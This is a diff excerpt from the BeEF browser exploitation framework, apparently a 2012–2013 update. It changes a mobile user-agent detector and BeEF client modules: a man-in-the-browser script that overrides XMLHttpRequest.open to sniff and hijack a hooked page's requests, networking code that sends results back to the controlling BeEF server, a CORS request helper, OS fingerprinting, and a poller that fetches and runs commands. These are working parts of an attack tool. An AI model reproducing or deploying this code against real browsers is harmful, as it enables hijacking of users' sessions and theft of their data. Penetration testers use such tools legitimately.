+   if (DetectOperaAndroidPhone())
+      return true;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroidTablet()
+{
+   if (!DetectAndroid())
+      return false;
+
+   if (DetectOperaMobile())
+      return false;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return false;
+
+   if (uagent.search(mobile) > -1)
+      return false;
+   else
+      return true;
+}
+
+
+function DetectAndroidWebKit()
+{
+   if (DetectAndroid() && DetectWebkit())
+      return true;
+   else
+      return false;
+}
+
+
+function DetectGoogleTV()
+{
+   if (uagent.search(deviceGoogleTV) > -1)
+      return true;
+   else
+      return false;
+}
+
+
+function DetectWebkit()
+{
+   if (uagent.search(engineWebKit) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectS60OssBrowser()
+{
+   if (DetectWebkit())
+   {
+     if ((uagent.search(deviceS60) > -1 ||
+          uagent.search(deviceSymbian) > -1))
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectSymbianOS()
+{
+   if (uagent.search(deviceSymbian) > -1 ||
+       uagent.search(deviceS60) > -1 ||
+       uagent.search(deviceS70) > -1 ||
+       uagent.search(deviceS80) > -1 ||
+       uagent.search(deviceS90) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWindowsPhone7()
+{
+   if (uagent.search(deviceWinPhone7) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWindowsMobile()
+{
+   if (DetectWindowsPhone7())
+      return false;
+   if (uagent.search(deviceWinMob) > -1 ||
+       uagent.search(deviceIeMob) > -1 ||
+       uagent.search(enginePie) > -1)
+      return true;
+   if ((uagent.search(devicePpc) > -1) &&
+       !(uagent.search(deviceMacPpc) > -1))
+      return true;
+   if (uagent.search(manuHtc) > -1 &&
+       uagent.search(deviceWindows) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerry()
+{
+   if (uagent.search(deviceBB) > -1)
+      return true;
+   if (uagent.search(vndRIM) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryTablet()
+{
+   if (uagent.search(deviceBBPlaybook) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryWebKit()
+{
+   if (DetectBlackBerry() &&
+       uagent.search(engineWebKit) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryTouch()
+{
+   if (DetectBlackBerry() &&
+        ((uagent.search(deviceBBStorm) > -1) ||
+        (uagent.search(deviceBBTorch) > -1) ||
+        (uagent.search(deviceBBBoldTouch) > -1) ||
+        (uagent.search(deviceBBCurveTouch) > -1) ))
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryHigh()
+{
+   if (DetectBlackBerryWebKit())
+      return false;
+   if (DetectBlackBerry())
+   {
+     if (DetectBlackBerryTouch() ||
+        uagent.search(deviceBBBold) > -1 ||
+        uagent.search(deviceBBTour) > -1 ||
+        uagent.search(deviceBBCurve) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectBlackBerryLow()
+{
+   if (DetectBlackBerry())
+   {
+     if (DetectBlackBerryHigh() || DetectBlackBerryWebKit())
+        return false;
+     else
+        return true;
+   }
+   else
+      return false;
+}
+
+
+function DetectPalmOS()
+{
+   if (uagent.search(devicePalm) > -1 ||
+       uagent.search(engineBlazer) > -1 ||
+       uagent.search(engineXiino) > -1)
+   {
+     if (DetectPalmWebOS())
+        return false;
+     else
+        return true;
+   }
+   else
+      return false;
+}
+
+function DetectPalmWebOS()
+{
+   if (uagent.search(deviceWebOS) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWebOSTablet()
+{
+   if (uagent.search(deviceWebOShp) > -1 &&
+       uagent.search(deviceTablet) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectGarminNuvifone()
+{
+   if (uagent.search(deviceNuvifone) > -1)
+      return true;
+   else
+      return false;
+}
+
+
+function DetectSmartphone()
+{
+   if (DetectIphoneOrIpod()
+      || DetectAndroidPhone()
+      || DetectS60OssBrowser()
+      || DetectSymbianOS()
+      || DetectWindowsMobile()
+      || DetectWindowsPhone7()
+      || DetectBlackBerry()
+      || DetectPalmWebOS()
+      || DetectPalmOS()
+      || DetectGarminNuvifone())
+      return true;
+
+   return false;
+};
+
+function DetectArchos()
+{
+   if (uagent.search(deviceArchos) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBrewDevice()
+{
+   if (uagent.search(deviceBrew) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectDangerHiptop()
+{
+   if (uagent.search(deviceDanger) > -1 ||
+       uagent.search(deviceHiptop) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectMaemoTablet()
+{
+   if (uagent.search(maemo) > -1)
+      return true;
+   if ((uagent.search(linux) > -1)
+       && (uagent.search(deviceTablet) > -1)
+       && !DetectWebOSTablet()
+       && !DetectAndroid())
+      return true;
+   else
+      return false;
+}
+
+function DetectSonyMylo()
+{
+   if (uagent.search(manuSony) > -1)
+   {
+     if (uagent.search(qtembedded) > -1 ||
+         uagent.search(mylocom2) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectOperaMobile()
+{
+   if (uagent.search(engineOpera) > -1)
+   {
+     if (uagent.search(mini) > -1 ||
+         uagent.search(mobi) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectOperaAndroidPhone()
+{
+   if ((uagent.search(engineOpera) > -1) &&
+      (uagent.search(deviceAndroid) > -1) &&
+      (uagent.search(mobi) > -1))
+      return true;
+   else
+      return false;
+}
+
+function DetectOperaAndroidTablet()
+{
+   if ((uagent.search(engineOpera) > -1) &&
+      (uagent.search(deviceAndroid) > -1) &&
+      (uagent.search(deviceTablet) > -1))
+      return true;
+   else
+      return false;
+}
+
+function DetectSonyPlaystation()
+{
+   if (uagent.search(devicePlaystation) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectNintendo()
+{
+   if (uagent.search(deviceNintendo) > -1   ||
+	uagent.search(deviceWii) > -1 ||
+	uagent.search(deviceNintendoDs) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectXbox()
+{
+   if (uagent.search(deviceXbox) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectGameConsole()
+{
+   if (DetectSonyPlaystation())
+      return true;
+   if (DetectNintendo())
+      return true;
+   if (DetectXbox())
+      return true;
+   else
+      return false;
+};
+
+function DetectKindle()
+{
+   if (uagent.search(deviceKindle) > -1 &&
+       !DetectAndroid())
+      return true;
+   else
+      return false;
+}
+
+function DetectAmazonSilk()
+{
+   if (uagent.search(engineSilk) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectMobileQuick()
+{
+   if (DetectTierTablet())
+      return false;
+
+   if (DetectSmartphone())
+      return true;
+
+   if (uagent.search(deviceMidp) > -1 ||
+	DetectBrewDevice())
+      return true;
+
+   if (DetectOperaMobile())
+      return true;
+
+   if (uagent.search(engineNetfront) > -1)
+      return true;
+   if (uagent.search(engineUpBrowser) > -1)
+      return true;
+   if (uagent.search(engineOpenWeb) > -1)
+      return true;
+
+   if (DetectDangerHiptop())
+      return true;
+
+   if (DetectMaemoTablet())
+      return true;
+   if (DetectArchos())
+      return true;
+
+   if ((uagent.search(devicePda) > -1) &&
+        !(uagent.search(disUpdate) > -1))
+      return true;
+   if (uagent.search(mobile) > -1)
+      return true;
+
+   if (DetectKindle() ||
+       DetectAmazonSilk())
+      return true;
+
+   return false;
+};
+
+
+function DetectMobileLong()
+{
+   if (DetectMobileQuick())
+      return true;
+   if (DetectGameConsole())
+      return true;
+   if (DetectSonyMylo())
+      return true;
+
+   if (uagent.search(manuSamsung1) > -1 ||
+	uagent.search(manuSonyEricsson) > -1 ||
+	uagent.search(manuericsson) > -1)
+      return true;
+
+   if (uagent.search(svcDocomo) > -1)
+      return true;
+   if (uagent.search(svcKddi) > -1)
+      return true;
+   if (uagent.search(svcVodafone) > -1)
+      return true;
+
+
+   return false;
+};
+
+
+function DetectTierTablet()
+{
+   if (DetectIpad()
+        || DetectAndroidTablet()
+        || DetectBlackBerryTablet()
+        || DetectWebOSTablet())
+      return true;
+   else
+      return false;
+};
+
+function DetectTierIphone()
+{
+   if (DetectIphoneOrIpod())
+      return true;
+   if (DetectAndroidPhone())
+      return true;
+   if (DetectBlackBerryWebKit() && DetectBlackBerryTouch())
+      return true;
+   if (DetectWindowsPhone7())
+      return true;
+   if (DetectPalmWebOS())
+      return true;
+   if (DetectGarminNuvifone())
+      return true;
+   else
+      return false;
+};
+
+function DetectTierRichCss()
+{
+    if (DetectMobileQuick())
+    {
+       if (DetectTierIphone() || DetectKindle())
+          return false;
+
+       if (DetectWebkit())
+          return true;
+       if (DetectS60OssBrowser())
+          return true;
+
+       if (DetectBlackBerryHigh())
+          return true;
+
+       if (DetectWindowsMobile())
+          return true;
+
+       if (uagent.search(engineTelecaQ) > -1)
+          return true;
+
+       else
+          return false;
+    }
+    else
+      return false;
+};
+
+function DetectTierOtherPhones()
+{
+    if (DetectMobileLong())
+    {
+       if (DetectTierIphone() || DetectTierRichCss())
+          return false;
+
+       else
+          return true;
+    }
+    else
+      return false;
+};
+
+
+function InitDeviceScan()
+{
+    isIphone = DetectIphoneOrIpod();
+    isAndroidPhone = DetectAndroidPhone();
+    isTierIphone = DetectTierIphone();
+    isTierTablet = DetectTierTablet();
+
+    isTierRichCss = DetectTierRichCss();
+    isTierGenericMobile = DetectTierOtherPhones();
+};
+
+InitDeviceScan()

core/main/client/logger.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/mitb.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -14,47 +14,30 @@ beef.mitb = {
         beef.mitb.cid = cid;
         beef.mitb.curl = curl;
         /*Override open method to intercept ajax request*/
-        var xml_type;
+        var hook_file = "<%= @hook_file %>";
 
         if (window.XMLHttpRequest && !(window.ActiveXObject)) {
 
-            xml_type = 'XMLHttpRequest';
-        }
-
-        if (xml_type == "XMLHttpRequest") {
             beef.mitb.sniff("Method XMLHttpRequest.open override");
             (function (open) {
-                XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
+                XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) {
-
+                    // Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler)
-                    var portRegex = new RegExp(":[0-9]+");
+                    // or a request initiated by the MiTB itself.
-                    var portR = portRegex.exec(url);
+                    if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) {
-                    /*return :port*/
+                        open.call(this, method, url, async, true);
-                    var requestPort;
+                    }else {
-
+                        var portRegex = new RegExp(":[0-9]+");
-                    if (portR != null) {
+                        var portR = portRegex.exec(url);
-                        requestPort = portR[0].split(":");
+                        var requestPort;
-                    }
+                        if (portR != null) { requestPort = portR[0].split(":")[1]; }
-
-                    if ((user == "beef") && (pass == "beef")) {
-                        /*a poisoned something*/
-                        open.call(this, method, url, async, null, null);
-                    }
-
-
-                    else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
-                        /*a beef hook.js polling or dh */
-                        open.call(this, method, url, async, null, null);
-                    }
-
-                    else {
 
+                        //GET request
                         if (method == "GET") {
+                            //GET request -> cross-domain
                             if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
                                 beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
                                 window.open(url);
-
+                            }else { //GET request -> same-domain
-                            }
-                            else {
                                 beef.mitb.sniff("GET [Ajax Request]: " + url);
                                 if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
                                     var title = "";
@@ -63,26 +46,19 @@ beef.mitb = {
                                     } else {
                                         title = document.getElementsByTagName("title")[0].innerHTML;
                                     }
-                                    /*write the url of the page*/
+                                    // write the url of the page
                                     history.pushState({ Be:"EF" }, title, url);
-
                                 }
-
                             }
-
+                        }else{
-                        }
+                            //POST request
-                        else {
+                            beef.mitb.sniff("POST ajax request to: " + url);
-                            /*if we are here we have an ajax post req*/
+                            open.call(this, method, url, async, true);
-                            beef.mitb.sniff("Post ajax request to: " + url);
-                            open.call(this, method, url, async, user, pass);
-
                         }
                     }
                 };
             })(XMLHttpRequest.prototype.open);
-
         }
-
     },
 
     // Initializes the hook on anchors and forms.
@@ -161,7 +137,7 @@ beef.mitb = {
     fetchForm:function (url, query, target) {
         try {
             var y = new XMLHttpRequest();
-            y.open('POST', url, false, "beef", "beef");
+            y.open('POST', url, false, true);
             y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
@@ -181,14 +157,13 @@ beef.mitb = {
     fetch:function (url, target) {
         try {
             var y = new XMLHttpRequest();
-            y.open('GET', url, false, "beef", "beef");
+            y.open('GET', url, false, true);
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
-
                     target.innerHTML = y.responseText;
                     setTimeout(beef.mitb.hook, 10);
                 }
-            }
+            };
             y.send(null);
             beef.mitb.sniff("GET: " + url);
             return true;
@@ -204,7 +179,7 @@ beef.mitb = {
         try {
             var target = document.getElementsByTagName("html")[0];
             var y = new XMLHttpRequest();
-            y.open('GET', url, false, "beef", "beef");
+            y.open('GET', url, false, true);
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
                     var title = "";
@@ -223,11 +198,9 @@ beef.mitb = {
             beef.mitb.sniff("GET: " + url);
 
         } catch (x) {
-
+            // the link is cross-domain, so load the resource in a different tab
-
             window.open(url);
             beef.mitb.sniff("GET [New Window]: " + url);
-
         }
     },
 

core/main/client/net.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -7,7 +7,14 @@
 /*!
  * @literal object: beef.net
  *
- * Provides basic networking functions.
+ * Provides basic networking functions,
+ * like beef.net.request and beef.net.forgeRequest,
+ * used by BeEF command modules and the Requester extension,
+ * as well as beef.net.send which is used to return commands
+ * to BeEF server-side components.
+ *
+ * Also, it contains the core methods used by the XHR-polling
+ * mechanism (flush, queue)
  */
 beef.net = {
 
@@ -21,7 +28,10 @@ beef.net = {
     sid_count:0,
     cmd_queue:[],
 
-    //Command object
+    /**
+     * Command object. This represents the data to be sent back to BeEF,
+     * using the beef.net.send() method.
+     */
     command:function () {
         this.cid = null;
         this.results = null;
@@ -29,13 +39,17 @@ beef.net = {
         this.callback = null;
     },
 
-    //Packet object
+    /**
+     * Packet object. A single chunk of data. X packets -> 1 stream
+     */
     packet:function () {
         this.id = null;
         this.data = null;
     },
 
-    //Stream object
+    /**
+     * Stream object. Contains X packets, which are command result chunks.
+     */
     stream:function () {
         this.id = null;
         this.packets = [];
@@ -51,7 +65,8 @@ beef.net = {
 
     /**
      * Response Object - used in the beef.net.request callback
-     * Note: as we are using async mode, the response object will be empty if returned.Using sync mode, request obj fields will be populated.
+     * NOTE: as we are using async mode, the response object will be empty if returned.
+     * Using sync mode, request obj fields will be populated.
      */
     response:function () {
         this.status_code = null;        // 500, 404, 200, 302
@@ -64,7 +79,13 @@ beef.net = {
         this.headers = null;            // full response headers
     },
 
-    //Queues the command, to be sent back to the framework on the next refresh
+    /**
+     * Queues the specified command results.
+     * @param: {String} handler: the server-side handler that will be called
+     * @param: {Integer} cid: command id
+     * @param: {String} results: the data to send
+     * @param: {Function} callback: the function to call after execution
+     */
     queue:function (handler, cid, results, callback) {
         if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
             var s = new beef.net.command();
@@ -76,26 +97,40 @@ beef.net = {
         }
     },
 
-    //Queues the current command and flushes the queue straight away
+    /**
+     * Queues the current command results and flushes the queue straight away.
+     * NOTE: Always send Browser Fingerprinting results
+     * (beef.net.browser_details(); -> /init handler) using normal XHR-polling,
+     * even if WebSockets are enabled.
+     * @param: {String} handler: the server-side handler that will be called
+     * @param: {Integer} cid: command id
+     * @param: {String} results: the data to send
+     * @param: {Function} callback: the function to call after execution
+     */
     send:function (handler, cid, results, callback) {
-        if (typeof beef.websocket === "undefined") {
+        if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
             this.queue(handler, cid, results, callback);
             this.flush();
-        }
+        }else {
-        else {
             try {
                 beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
                     '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
                     '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
-            }
+            }catch (e) {
-            catch (e) {
                 this.queue(handler, cid, results, callback);
                 this.flush();
-                }
+            }
         }
     },
 
-    //Flush all currently queued commands to the framework
+    /**
+     * Flush all currently queued command results to the framework,
+     * chopping the data in chunks ('chunk' method) which will be re-assembled
+     * server-side by the network stack.
+     * NOTE: currently 'flush' is used only with the default
+     * XHR-polling mechanism. If WebSockets are used, the data is sent
+     * back to BeEF straight away.
+     */
     flush:function () {
         if (this.cmd_queue.length > 0) {
             var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
@@ -119,13 +154,21 @@ beef.net = {
         }
     },
 
-    //Split string into chunk lengths determined by amount
+    /**
+     * Split the input data into chunk lengths determined by the amount parameter.
+     * @param: {String} str: the input data
+     * @param: {Integer} amount: chunk length
+     */
     chunk:function (str, amount) {
         if (typeof amount == 'undefined') n = 2;
         return str.match(RegExp('.{1,' + amount + '}', 'g'));
     },
 
-    //Push packets to framework
+    /**
+     * Push the input stream back to the BeEF server-side components.
+     * It uses beef.net.request to send back the data.
+     * @param: {Object} stream: the stream object to be sent back.
+     */
     push:function (stream) {
         //need to implement wait feature here eventually
         for (var i = 0; i < stream.pc; i++) {
@@ -134,7 +177,7 @@ beef.net = {
     },
 
     /**
-     *Performs http requests
+     * Performs http requests
      * @param: {String} scheme: HTTP or HTTPS
      * @param: {String} method: GET or POST
      * @param: {String} domain: bindshell.net, 192.168.3.4, etc
@@ -193,13 +236,12 @@ beef.net = {
             data:data,
             timeout:(timeout * 1000),
 
-            //needed otherwise jQuery always add Content-type: application/xml, even if data is populated
+            //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
             beforeSend:function (xhr) {
                 if (method == "POST") {
                     xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
                 }
             },
-
             success:function (data, textStatus, xhr) {
                 var end_time = new Date().getTime();
                 response.status_code = xhr.status;
@@ -240,9 +282,11 @@ beef.net = {
     },
 
     /*
-     * Similar to this.request, except from a few things that are needed when dealing with forged requests:
+     * Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
      *  - requestid: needed on the callback
      *  - allowCrossDomain: set cross-domain requests as allowed or blocked
+     *
+     * forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
      */
     forge_request:function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
 
@@ -285,14 +329,21 @@ beef.net = {
             return response;
         }
 
-        // build and execute the request
+        /*
-        if (method == "POST") {
+         * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
+         * This will turn POSTs into GETs for remote-domain requests.
+         */
+        if (method == "POST"){
             $j.ajaxSetup({
-                data:data
+                dataType: dataType
+            });
+        } else {
+            $j.ajaxSetup({
+                dataType: 'script'
             });
         }
 
-		// this is required for bugs in IE so data can be transfered back to the server
+		// this is required for bugs in IE so data can be transferred back to the server
         if ( beef.browser.isIE() ) {
             dataType = 'script'
         }
@@ -303,9 +354,7 @@ beef.net = {
             headers: headers,
             timeout: (timeout * 1000),
 
-            // needed otherwise jQuery always adds:
+            //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
-            // Content-type: application/xml
-            // even if data is populated
             beforeSend:function (xhr) {
                 if (method == "POST") {
                     xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
@@ -407,7 +456,9 @@ beef.net = {
         return false;
     },
 
-    //Sends back browser details to framework
+    /**
+     * Sends back browser details to framework, calling beef.browser.getDetails()
+     */
     browser_details:function () {
         var details = beef.browser.getDetails();
         details['HookSessionID'] = beef.session.get_hook_session_id();

core/main/client/net/cors.js

@@ -0,0 +1,77 @@
+beef.net.cors = {
+
+  handler: "cors",
+
+    /**
+     * Response Object - used in the beef.net.request callback
+     */
+    response:function () {
+        this.status  = null;      // 500, 404, 200, 302, etc
+        this.headers = null;      // full response headers
+        this.body    = null;      // full response body
+    },
+
+    /**
+     * Make a cross-domain request using CORS
+     *
+     * @param method {String} HTTP verb ('GET', 'POST', 'DELETE', etc.)
+     * @param url {String} url
+     * @param data {String} request body
+     * @param callback {Function} function to callback on completion
+     */
+    request: function(method, url, data, callback) {
+
+    var xhr;
+    var response = new this.response;
+
+    if (XMLHttpRequest) {
+        xhr = new XMLHttpRequest();
+
+        if ('withCredentials' in xhr) {
+            xhr.open(method, url, true);
+            xhr.onerror = function() {
+            };
+            xhr.onreadystatechange = function() {
+                if (xhr.readyState === 4) {
+                    response.headers = this.getAllResponseHeaders()
+                    response.body    = this.responseText;
+                    response.status  = this.status;
+                    if (!!callback) {
+                        if (!!response) {
+                            callback(response);
+                        } else { 
+                            callback('ERROR: No Response. CORS requests may be denied for this resource.')
+                        }
+                    }
+                }
+            };
+            xhr.send(data);
+        }
+    } else if (typeof XDomainRequest != "undefined") {
+        xhr = new XDomainRequest();
+        xhr.open(method, url);
+        xhr.onerror = function() {
+        };
+        xhr.onload = function() {
+            response.headers = this.getAllResponseHeaders()
+            response.body    = this.responseText;
+            response.status  = this.status;
+            if (!!callback) {
+                if (!!response) {
+                    callback(response);
+                } else {
+                    callback('ERROR: No Response. CORS requests may be denied for this resource.')
+                }
+            }
+        };
+        xhr.send(data);
+    } else {
+        if (!!callback) callback('ERROR: Not Supported. CORS is not supported by the browser. The request was not sent.');
+    }
+
+    }
+
+};
+
+beef.regCmp('beef.net.cors');
+

core/main/client/net/dns.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/net/local.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/net/portscanner.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/net/requester.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/os.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -7,9 +7,9 @@
 beef.os = {
 
 	ua: navigator.userAgent,
-	
+
 	isWin311: function() {
-		return (this.ua.indexOf("Win16") != -1) ? true : false;
+		return (this.ua.match('(Win16)')) ? true : false;
 	},
 	
 	isWinNT4: function() {
@@ -19,18 +19,25 @@ beef.os = {
 	isWin95: function() {
 		return (this.ua.match('(Windows 95)|(Win95)|(Windows_95)')) ? true : false;
 	},
+	isWinCE: function() {
+		return (this.ua.match('(Windows CE)')) ? true : false;
+	},
 	
 	isWin98: function() {
 		return (this.ua.match('(Windows 98)|(Win98)')) ? true : false;
 	},
 	
 	isWinME: function() {
-		return (this.ua.indexOf('Windows ME') != -1) ? true : false;
+		return (this.ua.match('(Windows ME)|(Win 9x 4.90)')) ? true : false;
 	},
 	
 	isWin2000: function() {
 		return (this.ua.match('(Windows NT 5.0)|(Windows 2000)')) ? true : false;
 	},
+
+	isWin2000SP1: function() {
+		return (this.ua.match('Windows NT 5.01 ')) ? true : false;
+	},
 	
 	isWinXP: function() {
 		return (this.ua.match('(Windows NT 5.1)|(Windows XP)')) ? true : false;
@@ -47,6 +54,10 @@ beef.os = {
 	isWin7: function() {
 		return (this.ua.match('(Windows NT 6.1)|(Windows NT 7.0)')) ? true : false;
 	},
+
+	isWin8: function() {
+		return (this.ua.match('(Windows NT 6.2)')) ? true : false;
+	},
 	
 	isOpenBSD: function() {
 		return (this.ua.indexOf('OpenBSD') != -1) ? true : false;
@@ -103,19 +114,26 @@ beef.os = {
 	isBeOS: function() {
 		return (this.ua.match('BeOS')) ? true : false;
 	},
+
+	isWindows: function() {
+		return this.isWin311() || this.isWinNT4() || this.isWinCE() || this.isWin95() || this.isWin98() || this.isWinME() || this.isWin2000() || this.isWin2000SP1() || this.isWinXP() || this.isWinServer2003() || this.isWinVista() || this.isWin7() || this.isWin8() || this.isWinPhone();
+	},
 	
 	getName: function() {
-		//windows
+		//Windows
-		if(this.isWin311()) return 'Windows 3.11';
+		if(this.isWin311())        return 'Windows 3.11';
-		if(this.isWinNT4()) return 'Windows NT 4';
+		if(this.isWinNT4())        return 'Windows NT 4';
-		if(this.isWin95()) return 'Windows 95';
+		if(this.isWinCE())         return 'Windows CE';
-		if(this.isWin98()) return 'Windows 98';
+		if(this.isWin95())         return 'Windows 95';
-		if(this.isWinME()) return 'Windows Millenium';
+		if(this.isWin98())         return 'Windows 98';
-		if(this.isWin2000()) return 'Windows 2000';
+		if(this.isWinME())         return 'Windows Millenium';
-		if(this.isWinXP()) return 'Windows XP';
+		if(this.isWin2000())       return 'Windows 2000';
+		if(this.isWin2000SP1())    return 'Windows 2000 SP1';
+		if(this.isWinXP())         return 'Windows XP';
 		if(this.isWinServer2003()) return 'Windows Server 2003';
-		if(this.isWinVista()) return 'Windows Vista';
+		if(this.isWinVista())      return 'Windows Vista';
-		if(this.isWin7()) return 'Windows 7';
+		if(this.isWin7())          return 'Windows 7';
+		if(this.isWin8())          return 'Windows 8';
 
 		//Nokia
 		if(this.isNokia()) {

core/main/client/session.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -68,26 +68,7 @@ beef.session = {
 		}
 		
 		return hook_session_id;
-	},
-
-	/**
-	 * Overrides each link, and creates an iframe (loading the href) instead of following the link
-	 */
-	persistent: function() {
-		$j('a').click(function(e) {
-			if ($j(this).attr('href') != '')
-			{
-				e.preventDefault();
-				beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
-				$j(document).attr('title', $j(this).html());
-				document.body.scroll = "no";
-				document.documentElement.style.overflow = 'hidden';
-			}
-		});
 	}
-	
-
-				
 };
 
 beef.regCmp('beef.session');

core/main/client/timeout.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/updater.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -8,13 +8,13 @@
  * @Literal object: beef.updater
  *
  * Object in charge of getting new commands from the BeEF framework and execute them.
+ * The XHR-polling channel is managed here. If WebSockets are enabled,
+ * websocket.ls is used instead.
  */
 beef.updater = {
 	
-	// Low timeouts combined with the way the framework sends commamd modules result 
+	// XHR-polling timeout.
-	// in instructions being sent repeatedly or complex code. 
+    xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
-	// If you suffer from ADHD, you can decrease this setting.
-	timeout: 5000,
 	
 	// A lock.
 	lock: false,
@@ -42,22 +42,22 @@ beef.updater = {
 			beef.net.flush();
 			if(beef.commands.length > 0) {
 				this.execute_commands();
-			}
+			}else {
-
-            else {
 				this.get_commands();    /*Polling*/
 			}
 		}
 
       // ( typeof beef.websocket === "undefined")
-		setTimeout("beef.updater.check();", beef.updater.timeout);
+		setTimeout("beef.updater.check();", beef.updater.xhr_poll_timeout);
 	},
 	
-	// Gets new commands from the framework.
+    /**
-	get_commands: function(http_response) {
+     * Gets new commands from the framework.
+     */
+	get_commands: function() {
 		try {
 			this.lock = true;
